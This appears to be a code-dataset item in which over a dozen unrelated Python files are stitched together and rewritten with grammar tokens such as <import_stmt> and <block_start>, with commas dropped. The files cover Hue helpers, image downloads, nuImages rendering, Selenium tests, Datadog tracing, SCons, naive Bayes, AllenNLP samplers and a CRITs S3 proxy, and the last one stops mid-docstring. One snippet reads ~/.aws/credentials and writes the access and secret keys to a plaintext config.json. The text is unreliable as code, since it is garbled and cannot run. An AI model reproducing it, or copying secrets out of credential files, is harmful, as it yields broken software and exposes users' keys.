"""Helper functions for Philips Hue v2."""<import_from_future_stmt> annotations<def_stmt>normalize_hue_brightness brightness:float|<none><arrow>float|<none><block_start>"""Return calculated brightness values."""<if_stmt>brightness<is><not><none># Hue uses a range of [0, 100] to control brightness. <block_start>brightness=float((brightness/255)<times>100)<block_end><return>brightness<block_end><def_stmt>normalize_hue_transition transition:float|<none><arrow>float|<none><block_start>"""Return rounded transition values."""<if_stmt>transition<is><not><none># hue transition duration is in milliseconds and round them to 100ms <block_start>transition=int(round(transition 1)<times>1000)<block_end><return>transition<block_end><def_stmt>normalize_hue_colortemp colortemp:int|<none><arrow>int|<none><block_start>"""Return color temperature within Hue's ranges."""<if_stmt>colortemp<is><not><none># Hue only accepts a range between 153..500 <block_start>colortemp=min(colortemp 500)<line_sep>colortemp=max(colortemp 153)<block_end><return>colortemp<block_end>
<import_stmt>os<line_sep>os.makedirs('./img/' exist_ok=<true>)<line_sep>IMAGE_URL="https://mofanpy.com/static/img/description/learning_step_flowchart.png"<def_stmt>urllib_download <block_start><import_from_stmt>urllib.request urlretrieve<line_sep>urlretrieve(IMAGE_URL './img/image1.png')# whole document <block_end><def_stmt>request_download <block_start><import_stmt>requests<line_sep>r=requests.get(IMAGE_URL)<with_stmt>open('./img/image2.png' 'wb')<as>f<block_start>f.write(r.content)# whole document <block_end><block_end><def_stmt>chunk_download <block_start><import_stmt>requests<line_sep>r=requests.get(IMAGE_URL stream=<true>)# stream loading <with_stmt>open('./img/image3.png' 'wb')<as>f<block_start><for_stmt>chunk r.iter_content(chunk_size=32)<block_start>f.write(chunk)<block_end><block_end><block_end>urllib_download()<line_sep>print('download image1')<line_sep>request_download()<line_sep>print('download image2')<line_sep>chunk_download()<line_sep>print('download image3')<line_sep>
<import_from_stmt>configparser ConfigParser<import_stmt>os<import_stmt>json<line_sep>obj={}<line_sep>config=ConfigParser()<line_sep>config.read(os.path.join(os.getenv("HOME") ".aws" "credentials"))<line_sep>obj["MY_ACCESS_KEY"]=config.get("default" "aws_access_key_id" fallback="")<line_sep>obj["MY_SECRET_KEY"]=config.get("default" "aws_secret_access_key" fallback="")<with_stmt>open("config.json" "w")<as>out<block_start>json.dump(obj out)<block_end>
# nuScenes dev-kit. # Code written by <NAME>, 2020. <import_stmt>argparse<import_stmt>gc<import_stmt>os<import_stmt>random<import_from_stmt>typing List<import_from_stmt>collections defaultdict<import_stmt>cv2<import_stmt>tqdm<import_from_stmt>nuimages.nuimages NuImages<def_stmt>render_images nuim:NuImages mode:str='all' cam_name:str=<none> log_name:str=<none> sample_limit:int=50 filter_categories:List[str]=<none> out_type:str='image' out_dir:str='~/Downloads/nuImages' cleanup:bool=<true><arrow><none><block_start>""" Render a random selection of images and save them to disk. Note: The images rendered here are keyframes only. :param nuim: NuImages instance. :param mode: What to render: "image" for the image without annotations, "annotated" for the image with annotations, "trajectory" for a rendering of the trajectory of the vehice, "all" to render all of the above separately. :param cam_name: Only render images from a particular camera, e.g. "CAM_BACK'. :param log_name: Only render images from a particular log, e.g. "n013-2018-09-04-13-30-50+0800". :param sample_limit: Maximum number of samples (images) to render. Note that the mini split only includes 50 images. :param filter_categories: Specify a list of object_ann category names. Every sample that is rendered must contain annotations of any of those categories. :param out_type: The output type as one of the following: 'image': Renders a single image for the image keyframe of each sample. 'video': Renders a video for all images/pcls in the clip associated with each sample. :param out_dir: Folder to render the images to. :param cleanup: Whether to delete images after rendering the video. Not relevant for out_type == 'image'. """<line_sep># Check and convert inputs. <assert_stmt>out_type<in>['image' 'video'] ' Error: Unknown out_type %s!'%out_type<line_sep>all_modes=['image' 'annotated' 'trajectory']<assert_stmt>mode<in>all_modes+['all'] 'Error: Unknown mode %s!'%mode<assert_stmt><not>(out_type<eq>'video'<and>mode<eq>'trajectory') 'Error: Cannot render "trajectory" for videos!'<if_stmt>mode<eq>'all'<block_start><if_stmt>out_type<eq>'image'<block_start>modes=all_modes<block_end><elif_stmt>out_type<eq>'video'<block_start>modes=[m<for>m all_modes<if>m<not><in>['annotated' 'trajectory']]<block_end><else_stmt><block_start><raise>Exception('Error" Unknown mode %s!'%mode)<block_end><block_end><else_stmt><block_start>modes=[mode]<block_end><if_stmt>filter_categories<is><not><none><block_start>category_names=[c['name']<for>c nuim.category]<for_stmt>category_name filter_categories<block_start><assert_stmt>category_name<in>category_names 'Error: Invalid object_ann category %s!'%category_name<block_end><block_end># Create output folder. out_dir=os.path.expanduser(out_dir)<if_stmt><not>os.path.isdir(out_dir)<block_start>os.makedirs(out_dir)<block_end># Filter by camera. sample_tokens=[s['token']<for>s nuim.sample]<if_stmt>cam_name<is><not><none><block_start>sample_tokens_cam=[]<for_stmt>sample_token sample_tokens<block_start>sample=nuim.get('sample' sample_token)<line_sep>key_camera_token=sample['key_camera_token']<line_sep>sensor=nuim.shortcut('sample_data' 'sensor' key_camera_token)<if_stmt>sensor['channel']<eq>cam_name<block_start>sample_tokens_cam.append(sample_token)<block_end><block_end>sample_tokens=sample_tokens_cam<block_end># Filter by log. <if_stmt>log_name<is><not><none><block_start>sample_tokens_cleaned=[]<for_stmt>sample_token sample_tokens<block_start>sample=nuim.get('sample' sample_token)<line_sep>log=nuim.get('log' sample['log_token'])<if_stmt>log['logfile']<eq>log_name<block_start>sample_tokens_cleaned.append(sample_token)<block_end><block_end>sample_tokens=sample_tokens_cleaned<block_end># Filter samples by category. <if_stmt>filter_categories<is><not><none># Get categories in each sample. <block_start>sd_to_object_cat_names=defaultdict(<lambda>:set())<for_stmt>object_ann nuim.object_ann<block_start>category=nuim.get('category' object_ann['category_token'])<line_sep>sd_to_object_cat_names[object_ann['sample_data_token']].add(category['name'])<block_end># Filter samples. sample_tokens_cleaned=[]<for_stmt>sample_token sample_tokens<block_start>sample=nuim.get('sample' sample_token)<line_sep>key_camera_token=sample['key_camera_token']<line_sep>category_names=sd_to_object_cat_names[key_camera_token]<if_stmt>any([c<in>category_names<for>c filter_categories])<block_start>sample_tokens_cleaned.append(sample_token)<block_end><block_end>sample_tokens=sample_tokens_cleaned<block_end># Get a random selection of samples. random.shuffle(sample_tokens)<line_sep># Limit number of samples. sample_tokens=sample_tokens[:sample_limit]<line_sep>print('Rendering %s for mode %s to folder %s...'%(out_type mode out_dir))<for_stmt>sample_token tqdm.tqdm(sample_tokens)<block_start>sample=nuim.get('sample' sample_token)<line_sep>log=nuim.get('log' sample['log_token'])<line_sep>log_name=log['logfile']<line_sep>key_camera_token=sample['key_camera_token']<line_sep>sensor=nuim.shortcut('sample_data' 'sensor' key_camera_token)<line_sep>sample_cam_name=sensor['channel']<line_sep>sd_tokens=nuim.get_sample_content(sample_token)<line_sep># We cannot render a video if there are missing camera sample_datas. <if_stmt>len(sd_tokens)<l>13<and>out_type<eq>'video'<block_start>print('Warning: Skipping video for sample token %s, as not all 13 frames exist!'%sample_token)<line_sep><continue><block_end><for_stmt>mode modes<block_start>out_path_prefix=os.path.join(out_dir '%s_%s_%s_%s'%(log_name sample_token sample_cam_name mode))<if_stmt>out_type<eq>'image'<block_start>write_image(nuim key_camera_token mode '%s.jpg'%out_path_prefix)<block_end><elif_stmt>out_type<eq>'video'<block_start>write_video(nuim sd_tokens mode out_path_prefix cleanup=cleanup)<block_end><block_end><block_end><block_end><def_stmt>write_video nuim:NuImages sd_tokens:List[str] mode:str out_path_prefix:str cleanup:bool=<true><arrow><none><block_start>""" Render a video by combining all the images of type mode for each sample_data. :param nuim: NuImages instance. :param sd_tokens: All sample_data tokens in chronological order. :param mode: The mode - see render_images(). :param out_path_prefix: The file prefix used for the images and video. :param cleanup: Whether to delete images after rendering the video. """<line_sep># Loop through each frame to create the video. out_paths=[]<for_stmt>i,sd_token enumerate(sd_tokens)<block_start>out_path='%s_%d.jpg'%(out_path_prefix i)<line_sep>out_paths.append(out_path)<line_sep>write_image(nuim sd_token mode out_path)<block_end># Create video. first_im=cv2.imread(out_paths[0])<line_sep>freq=2# Display frequency (Hz). fourcc=cv2.VideoWriter_fourcc(*'MJPG')<line_sep>video_path='%s.avi'%out_path_prefix<line_sep>out=cv2.VideoWriter(video_path fourcc freq first_im.shape[1::-1])<line_sep># Load each image and add to the video. <for_stmt>out_path out_paths<block_start>im=cv2.imread(out_path)<line_sep>out.write(im)<line_sep># Delete temporary image if requested. <if_stmt>cleanup<block_start>os.remove(out_path)<block_end><block_end># Finalize video. out.release()<block_end><def_stmt>write_image nuim:NuImages sd_token:str mode:str out_path:str<arrow><none><block_start>""" Render a single image of type mode for the given sample_data. :param nuim: NuImages instance. :param sd_token: The sample_data token. :param mode: The mode - see render_images(). :param out_path: The file to write the image to. """<if_stmt>mode<eq>'annotated'<block_start>nuim.render_image(sd_token annotation_type='all' out_path=out_path)<block_end><elif_stmt>mode<eq>'image'<block_start>nuim.render_image(sd_token annotation_type='none' out_path=out_path)<block_end><elif_stmt>mode<eq>'trajectory'<block_start>sample_data=nuim.get('sample_data' sd_token)<line_sep>nuim.render_trajectory(sample_data['sample_token'] out_path=out_path)<block_end><else_stmt><block_start><raise>Exception('Error: Unknown mode %s!'%mode)<block_end># Trigger garbage collection to avoid memory overflow from the render functions. gc.collect()<block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Render a random selection of images and save them to disk.')<line_sep>parser.add_argument('--seed' type=int default=42)# Set to 0 to disable. parser.add_argument('--version' type=str default='v1.0-mini')<line_sep>parser.add_argument('--dataroot' type=str default='/data/sets/nuimages')<line_sep>parser.add_argument('--verbose' type=int default=1)<line_sep>parser.add_argument('--mode' type=str default='all')<line_sep>parser.add_argument('--cam_name' type=str default=<none>)<line_sep>parser.add_argument('--log_name' type=str default=<none>)<line_sep>parser.add_argument('--sample_limit' type=int default=50)<line_sep>parser.add_argument('--filter_categories' action='append')<line_sep>parser.add_argument('--out_type' type=str default='image')<line_sep>parser.add_argument('--out_dir' type=str default='~/Downloads/nuImages')<line_sep>args=parser.parse_args()<line_sep># Set random seed for reproducible image selection. <if_stmt>args.seed<ne>0<block_start>random.seed(args.seed)<block_end># Initialize NuImages class. nuim_=NuImages(version=args.version dataroot=args.dataroot verbose=bool(args.verbose) lazy=<false>)<line_sep># Render images. render_images(nuim_ mode=args.mode cam_name=args.cam_name log_name=args.log_name sample_limit=args.sample_limit filter_categories=args.filter_categories out_type=args.out_type out_dir=args.out_dir)<block_end>
<import_from_stmt>kivy.logger Logger<import_from_stmt>kivy.utils platform<line_sep>__version__="2.3.2"<line_sep>_log_message="KivyAuth:"+f" {__version__}"+f' (installed at "{__file__}")'<line_sep>__all__=("login_providers" "auto_login")<line_sep>Logger.info(_log_message)<line_sep>
# coding=utf-8 <import_stmt>logging<import_stmt>random<import_stmt>string<import_stmt>sys<import_stmt>unittest<import_from_stmt>time time sleep<import_stmt>apiritif<import_stmt>os<import_stmt>re<import_from_stmt>selenium webdriver<import_from_stmt>selenium.common.exceptions NoSuchElementException TimeoutException<import_from_stmt>selenium.webdriver.common.by By<import_from_stmt>selenium.webdriver.common.action_chains ActionChains<import_from_stmt>selenium.webdriver.support.ui Select<import_from_stmt>selenium.webdriver.support expected_conditions<as>econd<import_from_stmt>selenium.webdriver.support.wait WebDriverWait<import_from_stmt>selenium.webdriver.common.keys Keys<import_from_stmt>bzt.resources.selenium_extras waiter get_locator<class_stmt>TestSc1(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.vars={}<line_sep>timeout=2.0<line_sep>options=webdriver.FirefoxOptions()<line_sep>profile=webdriver.FirefoxProfile()<line_sep>profile.set_preference('webdriver.log.file' '/somewhere/webdriver.log')<line_sep>options.set_capability('unhandledPromptBehavior' 'ignore')<line_sep>self.driver=webdriver.Firefox(profile options=options)<line_sep>self.driver.implicitly_wait(timeout)<line_sep>apiritif.put_into_thread_store(timeout=timeout func_mode=<false> driver=self.driver windows={} scenario_name='sc1')<block_end><def_stmt>_1_httpsblazedemocomsetup1 self<block_start><with_stmt>apiritif.smart_transaction('https://blazedemo.com/setup1')<block_start>self.driver.get('https://blazedemo.com/setup1')<block_end><block_end><def_stmt>_2_setup2 self<block_start><with_stmt>apiritif.smart_transaction('setup2')<block_start>self.driver.get('https://blazedemo.com/setup2')<line_sep>waiter()<block_end><block_end><def_stmt>_3_httpsblazedemocommain1 self<block_start><with_stmt>apiritif.smart_transaction('https://blazedemo.com/main1')<block_start>self.driver.get('https://blazedemo.com/main1')<block_end><block_end><def_stmt>_4_main2 self<block_start><with_stmt>apiritif.smart_transaction('main2')<block_start>self.driver.get('https://blazedemo.com/main2')<line_sep>waiter()<block_end><block_end><def_stmt>_5_httpsblazedemocomteardown1 self<block_start><with_stmt>apiritif.smart_transaction('https://blazedemo.com/teardown1')<block_start>self.driver.get('https://blazedemo.com/teardown1')<block_end><block_end><def_stmt>_6_teardown2 self<block_start><with_stmt>apiritif.smart_transaction('teardown2')<block_start>self.driver.get('https://blazedemo.com/teardown2')<line_sep>waiter()<block_end><block_end><def_stmt>test_sc1 self<block_start><try_stmt><block_start>self._1_httpsblazedemocomsetup1()<line_sep>self._2_setup2()<line_sep>self._3_httpsblazedemocommain1()<line_sep>self._4_main2()<block_end><finally_stmt><block_start>apiritif.set_stage("teardown")# can't be interrupted self._5_httpsblazedemocomteardown1()<line_sep>self._6_teardown2()<block_end><block_end><def_stmt>tearDown self<block_start><if_stmt>self.driver<block_start>self.driver.quit()<block_end><block_end><block_end>
<import_stmt>platform<import_stmt>requests<class_stmt>DDTransport(object)<block_start>""" DDTransport contains all the logic for sending Traces to Datadog :type trace_addr: str :param trace_addr: trace_addr specifies the host[:port] address of the Datadog Trace Agent. """<def_stmt>__init__ self trace_addr<block_start>self._trace_addr=trace_addr<line_sep>self._headers={"Datadog-Meta-Lang":"python" "Datadog-Meta-Lang-Interpreter":platform.platform() # Following the example of the Golang version it is prefixed # OC for Opencensus. "Datadog-Meta-Tracer-Version":"OC/0.0.1" "Content-Type":"application/json" }<block_end>@property<def_stmt>trace_addr self<block_start>""" specifies the host[:port] address of the Datadog Trace Agent. """<line_sep><return>self._trace_addr<block_end>@property<def_stmt>headers self<block_start>""" specifies the headers that will be attached to HTTP request sent to DD. """<line_sep><return>self._headers<block_end><def_stmt>send_traces self trace<block_start>""" Sends traces to the Datadog Tracing Agent :type trace: dic :param trace: Trace dictionary """<line_sep>requests.post("http://"+self.trace_addr+"/v0.4/traces" json=trace headers=self.headers)<block_end><block_end>
# MIT License # # Copyright The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """Variable type for package Variables. To be used whenever a 'package' may be enabled/disabled and the package path may be specified. Given these options :: x11=no (disables X11 support) x11=yes (will search for the package installation dir) x11=/usr/local/X11 (will check this path for existence) Can be used as a replacement for autoconf's ``--with-xxx=yyy`` :: opts = Variables() opts.Add( PackageVariable( key='x11', help='use X11 installed here (yes = search some places)', default='yes' ) ) ... if env['x11'] == True: dir = ... # search X11 in some standard places ... env['x11'] = dir if env['x11']: ... # build with x11 ... """<import_from_stmt>typing Tuple Callable<import_stmt>SCons.Errors<line_sep>__all__=['PackageVariable' ]<line_sep>ENABLE_STRINGS=('1' 'yes' 'true' 'on' 'enable' 'search')<line_sep>DISABLE_STRINGS=('0' 'no' 'false' 'off' 'disable')<def_stmt>_converter val<block_start>""" """<line_sep>lval=val.lower()<if_stmt>lval<in>ENABLE_STRINGS<block_start><return><true><block_end><if_stmt>lval<in>DISABLE_STRINGS<block_start><return><false><block_end><return>val<block_end><def_stmt>_validator key val env searchfunc<arrow><none><block_start>""" """<line_sep># NB: searchfunc is currently undocumented and unsupported # TODO write validator, check for path <import_stmt>os<if_stmt>env[key]<is><true><block_start><if_stmt>searchfunc<block_start>env[key]=searchfunc(key val)<block_end><block_end><elif_stmt>env[key]<and><not>os.path.exists(val)<block_start><raise>SCons.Errors.UserError('Path does not exist for option %s: %s'%(key val))<block_end><block_end><def_stmt>PackageVariable key help default searchfunc=<none><arrow>Tuple[str str str Callable Callable]<block_start>"""Return a tuple describing a package list SCons Variable. The input parameters describe a 'package list' option. Returns a tuple including the correct converter and validator appended. The result is usable as input to :meth:`Add` . A 'package list' option may either be 'all', 'none' or a pathname string. This information is appended to *help*. """<line_sep># NB: searchfunc is currently undocumented and unsupported help='\n '.join((help '( yes | no | /path/to/%s )'%key))<line_sep><return>(key help default <lambda>k v e:_validator(k v e searchfunc) _converter)<block_end># Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
# coding=utf-8 <import_stmt>sys<import_from_stmt>teamcity.unittestpy TeamcityTestRunner<if_stmt>sys.version_info<l>(2 7)<block_start><import_from_stmt>unittest2 main TestCase expectedFailure<block_end><else_stmt><block_start><import_from_stmt>unittest main TestCase expectedFailure<block_end><class_stmt>TestSkip(TestCase)<block_start><def_stmt>test_expected_failure self<block_start>self.fail("this should happen unfortunately")<block_end>test_expected_failure=expectedFailure(test_expected_failure)<block_end>main(testRunner=TeamcityTestRunner)<line_sep>
<import_stmt>numpy<as>np<import_from_stmt>sklearn.preprocessing OneHotEncoder<class_stmt>MultinomialNB<block_start>""" Naive Bayes algorithm with discrete inputs Parameters ---------- alpha : float, optional (default=1.) Smooth parameter used in Naive Bayes, default is 1 (which indicates a laplace smoothing) Attributes ---------- enc : OneHotEncoder One-Hot encoder used to transform (discrete) inputs class_log_prior : np.ndarray of float Log class prior used to calculate (linear) prediction feature_log_prob : np.ndarray of float Feature log probability used to calculate (linear) prediction Examples -------- >>> import numpy as np >>> x = np.random.randint(0, 10, [1000, 10]) # Generate feature vectors >>> y = np.random.randint(0, 5, 1000) # Generate labels >>> nb = MultinomialNB().fit(x, y) # fit the model >>> nb.predict(x) # (linear) prediction >>> nb.predict_class(x) # predict labels """<def_stmt>__init__ self alpha=1.<block_start>self.alpha=alpha<line_sep>self.enc=self.class_log_prior=self.feature_log_prob=<none><block_end><def_stmt>fit self x y do_one_hot=<true><block_start>""" Fit the model with x & y Parameters ---------- x : {list of float, np.ndarray of float} Feature vectors used for training Note: features are assumed to be discrete y : {list of float, np.ndarray of float} Labels used for training do_one_hot : bool, optional (default=True) Whether do one-hot encoding on x Returns ------- self : MultinomialNB Returns self. """<if_stmt>do_one_hot<block_start>self.enc=OneHotEncoder(dtype=np.float32)<line_sep>x=self.enc.fit_transform(x)<block_end><else_stmt><block_start>self.enc=<none><line_sep>x=np.array(x np.float32)<block_end>n=x.shape[0]<line_sep>y=np.array(y np.int8)<line_sep>self.class_log_prior=np.log(np.bincount(y)/n)<line_sep>masks=[y<eq>i<for>i range(len(self.class_log_prior))]<line_sep>masked_xs=[x[mask]<for>mask masks]<line_sep>feature_counts=np.array([np.asarray(masked_x.sum(0))[0]<for>masked_x masked_xs])<line_sep>smoothed_fc=feature_counts+self.alpha<line_sep>self.feature_log_prob=np.log(smoothed_fc/smoothed_fc.sum(1 keepdims=<true>))<line_sep><return>self<block_end><def_stmt>_predict self x<block_start>""" Internal method for calculating (linear) predictions Parameters ---------- x : {np.ndarray of float, scipy.sparse.csr.csr_matrix of float} One-Hot encoded feature vectors Returns ------- predictions : np.ndarray of float Returns (linear) predictions. """<line_sep><return>x.dot(self.feature_log_prob.T)+self.class_log_prior<block_end><def_stmt>predict self x<block_start>""" API for calculating (linear) predictions Parameters ---------- x : {list of float, np.ndarray of float} Target feature vectors Returns ------- predictions : np.ndarray of float Returns (linear) predictions. """<if_stmt>self.enc<is><not><none><block_start>x=self.enc.transform(x)<block_end><return>self._predict(x)<block_end><def_stmt>predict_class self x<block_start>""" API for predicting labels Parameters ---------- x : {list of float, np.ndarray of float} Target feature vectors Returns ------- labels : np.ndarray of int Returns labels. """<line_sep><return>np.argmax(self.predict(x) 1)<block_end><block_end>
<import_from_stmt>allennlp.common Params<import_from_stmt>allennlp.data Instance Token Batch<import_from_stmt>allennlp.data.fields TextField<import_from_stmt>allennlp.data.samplers BucketBatchSampler<import_from_stmt>allennlp.data.data_loaders MultiProcessDataLoader<import_from_stmt>.sampler_test SamplerTest<class_stmt>TestBucketSampler(SamplerTest)<block_start><def_stmt>test_create_batches_groups_correctly self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"])<line_sep>grouped_instances=[]<for_stmt>indices sampler.get_batch_indices(self.instances)<block_start>grouped_instances.append([self.instances[idx]<for>idx indices])<block_end>expected_groups=[[self.instances[4] self.instances[2]] [self.instances[0] self.instances[1]] [self.instances[3]] ]<for_stmt>group grouped_instances<block_start><assert_stmt>group<in>expected_groups<line_sep>expected_groups.remove(group)<block_end><assert_stmt>expected_groups<eq>[]<block_end><def_stmt>test_disable_shuffle self<block_start>sampler=BucketBatchSampler(batch_size=2 sorting_keys=["text"] shuffle=<false>)<line_sep>grouped_instances=[]<for_stmt>indices sampler.get_batch_indices(self.instances)<block_start>grouped_instances.append([self.instances[idx]<for>idx indices])<block_end>expected_groups=[[self.instances[4] self.instances[2]] [self.instances[0] self.instances[1]] [self.instances[3]] ]<for_stmt>idx,group enumerate(grouped_instances)<block_start><assert_stmt>group<eq>expected_groups[idx]<block_end><block_end><def_stmt>test_guess_sorting_key_picks_the_longest_key self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0)<line_sep>instances=[]<line_sep>short_tokens=[Token(t)<for>t ["what" "is" "this" "?"]]<line_sep>long_tokens=[Token(t)<for>t ["this" "is" "a" "not" "very" "long" "passage"]]<line_sep>instances.append(Instance({"question":TextField(short_tokens self.token_indexers) "passage":TextField(long_tokens self.token_indexers) }))<line_sep>instances.append(Instance({"question":TextField(short_tokens self.token_indexers) "passage":TextField(long_tokens self.token_indexers) }))<line_sep>instances.append(Instance({"question":TextField(short_tokens self.token_indexers) "passage":TextField(long_tokens self.token_indexers) }))<assert_stmt>sampler.sorting_keys<is><none><line_sep>sampler._guess_sorting_keys(instances)<assert_stmt>sampler.sorting_keys<eq>["passage"]<block_end><def_stmt>test_from_params self<block_start>params=Params({})<line_sep>sorting_keys=["s1" "s2"]<line_sep>params["sorting_keys"]=sorting_keys<line_sep>params["batch_size"]=32<line_sep>sampler=BucketBatchSampler.from_params(params=params)<assert_stmt>sampler.sorting_keys<eq>sorting_keys<assert_stmt>sampler.padding_noise<eq>0.1<assert_stmt>sampler.batch_size<eq>32<line_sep>params=Params({"sorting_keys":sorting_keys "padding_noise":0.5 "batch_size":100 "drop_last":<true> })<line_sep>sampler=BucketBatchSampler.from_params(params=params)<assert_stmt>sampler.sorting_keys<eq>sorting_keys<assert_stmt>sampler.padding_noise<eq>0.5<assert_stmt>sampler.batch_size<eq>100<assert_stmt>sampler.drop_last<block_end><def_stmt>test_drop_last_works self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"] drop_last=<true> )<line_sep># We use a custom collate_fn for testing, which doesn't actually create tensors, # just the allennlp Batches. <def_stmt>collate_fn x **kwargs<block_start><return>Batch(x)<block_end>data_loader=MultiProcessDataLoader(self.get_mock_reader() "fake_path" batch_sampler=sampler )<line_sep>data_loader.collate_fn=collate_fn<line_sep>data_loader.index_with(self.vocab)<line_sep>batches=[batch<for>batch iter(data_loader)]<line_sep>stats=self.get_batches_stats(batches)<line_sep># all batches have length batch_size <assert_stmt>all(batch_len<eq>2<for>batch_len stats["batch_lengths"])<line_sep># we should have lost one instance by skipping the last batch <assert_stmt>stats["total_instances"]<eq>len(self.instances)-1<block_end><def_stmt>test_batch_count self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"])<line_sep>data_loader=MultiProcessDataLoader(self.get_mock_reader() "fake_path" batch_sampler=sampler)<line_sep>data_loader.index_with(self.vocab)<assert_stmt>len(data_loader)<eq>3<block_end><def_stmt>test_batch_count_with_drop_last self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"] drop_last=<true> )<line_sep>data_loader=MultiProcessDataLoader(self.get_mock_reader() "fake_path" batch_sampler=sampler)<assert_stmt>len(data_loader)<eq>2<block_end><block_end>
<import_from_stmt>typing Dict<import_from_stmt>river base<line_sep>__all__=["Renamer" "Prefixer" "Suffixer"]<class_stmt>Renamer(base.Transformer)<block_start>"""Renames features following substitution rules. Parameters ---------- mapping Dictionnary describing substitution rules. Keys in `mapping` that are not a feature's name are silently ignored. Examples -------- >>> from river import compose >>> mapping = {'a': 'v', 'c': 'o'} >>> x = {'a': 42, 'b': 12} >>> compose.Renamer(mapping).transform_one(x) {'b': 12, 'v': 42} """<def_stmt>__init__ self mapping:Dict[str str]<block_start>self.mapping=mapping<block_end><def_stmt>transform_one self x<block_start><for_stmt>old_key,new_key self.mapping.items()<block_start><try_stmt><block_start>x[new_key]=x.pop(old_key)<block_end><except_stmt>KeyError<block_start><pass><block_end><block_end># Ignoring keys that are not a feature's name <return>x<block_end><block_end><class_stmt>Prefixer(base.Transformer)<block_start>"""Prepends a prefix on features names. Parameters ---------- prefix Examples -------- >>> from river import compose >>> x = {'a': 42, 'b': 12} >>> compose.Prefixer('prefix_').transform_one(x) {'prefix_a': 42, 'prefix_b': 12} """<def_stmt>__init__ self prefix:str<block_start>self.prefix=prefix<block_end><def_stmt>_rename self s:str<arrow>str<block_start><return>f"{self.prefix}{s}"<block_end><def_stmt>transform_one self x<block_start><return>{self._rename(i):xi<for>i,xi x.items()}<block_end><block_end><class_stmt>Suffixer(base.Transformer)<block_start>"""Appends a suffix on features names. Parameters ---------- suffix Examples -------- >>> from river import compose >>> x = {'a': 42, 'b': 12} >>> compose.Suffixer('_suffix').transform_one(x) {'a_suffix': 42, 'b_suffix': 12} """<def_stmt>__init__ self suffix:str<block_start>self.suffix=suffix<block_end><def_stmt>_rename self s:str<arrow>str<block_start><return>f"{s}{self.suffix}"<block_end><def_stmt>transform_one self x<block_start><return>{self._rename(i):xi<for>i,xi x.items()}<block_end><block_end>
<import_stmt>datetime<import_from_stmt>dateutil.parser parse<import_from_stmt>mongoengine DateTimeField FileField<import_from_stmt>mongoengine.connection DEFAULT_CONNECTION_NAME<line_sep>#from mongoengine.python_support import str_types <import_from_stmt>six string_types<as>str_types<import_stmt>io<import_from_stmt>django.conf settings<if_stmt>settings.FILE_DB<eq>settings.S3<block_start><import_stmt>crits.core.s3_tools<as>S3<block_end><class_stmt>CritsDateTimeField(DateTimeField)<block_start>""" Custom MongoEngine DateTimeField. Utilizes a transform such that if the value passed in is a string we will convert it to a datetime.datetime object, or if it is set to None we will use the current datetime (useful when instantiating new objects and wanting the default dates to all be the current datetime). """<def_stmt>__set__ self instance value<block_start>value=self.transform(value)<line_sep><return>super(CritsDateTimeField self).__set__(instance value)<block_end><def_stmt>transform self value<block_start><if_stmt>value<and>isinstance(value basestring)<block_start><return>parse(value fuzzy=<true>)<block_end><elif_stmt><not>value<block_start><return>datetime.datetime.now()<block_end><else_stmt><block_start><return>value<block_end><block_end><block_end><class_stmt>S3Proxy(object)<block_start>""" Custom proxy for MongoEngine which uses S3 to store binaries instead of GridFS. """<def_stmt>__init__ self grid_id=<none> key=<none> instance=<none> db_alias=DEFAULT_CONNECTION_NAME collection_name='fs'<block_start>self.grid_id=grid_id# Store id for file self.key=key<line_sep>self.instance=instance<line_sep>self.db_alias=db_alias<line_sep>self.collection_name=collection_name<line_sep>self.newfile=<none># Used for partial writes self.gridout=<none><block_end><def_stmt>__getattr__ self name<block_start>attrs=('_fs' 'grid_id' 'key' 'instance' 'db_alias' 'collection_name' 'newfile' 'gridout')<if_stmt>name<in>attrs<block_start><return>self.__getattribute__(name)<block_end>obj=self.get()<if_stmt>name<in>dir(obj)<block_start><return>getattr(obj name)<block_end><raise>AttributeError<block_end><def_stmt>__get__ self instance value<block_start><return>self<block_end><def_stmt>__repr__ self<block_start><return>'<%s: %s>'%(self.__class__.__name__ self.grid_id)<block_end><def_stmt>delete self# Delete file from S3, FileField still remains <block_start>S3.delete_file_s3(self.grid_id self.collection_name)<line_sep>self.grid_id=<none><line_sep>self.gridout=<none><line_sep>self._mark_as_changed()<block_end><def_stmt>get self id=<none><block_start><if_stmt>id<block_start>self.grid_id=id<block_end><if_stmt>self.grid_id<is><none><block_start><return><none><block_end><try_stmt><block_start><if_stmt>self.gridout<is><none><block_start>self.gridout=io.BytesIO(S3.get_file_s3(self.grid_id self.collection_name))<block_end><return>self.gridout<block_end><except_stmt><block_start><return><none><block_end><block_end><def_stmt>put self file_obj **kwargs<block_start><if_stmt>self.grid_id<block_start><raise>Exception('This document already has a file. Either delete '<concat>'it or call replace to overwrite it')<block_end>self.grid_id=S3.put_file_s3(file_obj self.collection_name)<line_sep>self._mark_as_changed()<block_end><def_stmt>read self size=-1<block_start>gridout=self.get()<if_stmt>gridout<is><none><block_start><return><none><block_end><else_stmt><block_start><try_stmt><block_start><return>gridout.read(size)<block_end><except_stmt><block_start><return>""<block_end><block_end><block_end><def_stmt>_mark_as_changed self<block_start>"""Inform the instance that `self.key` has been 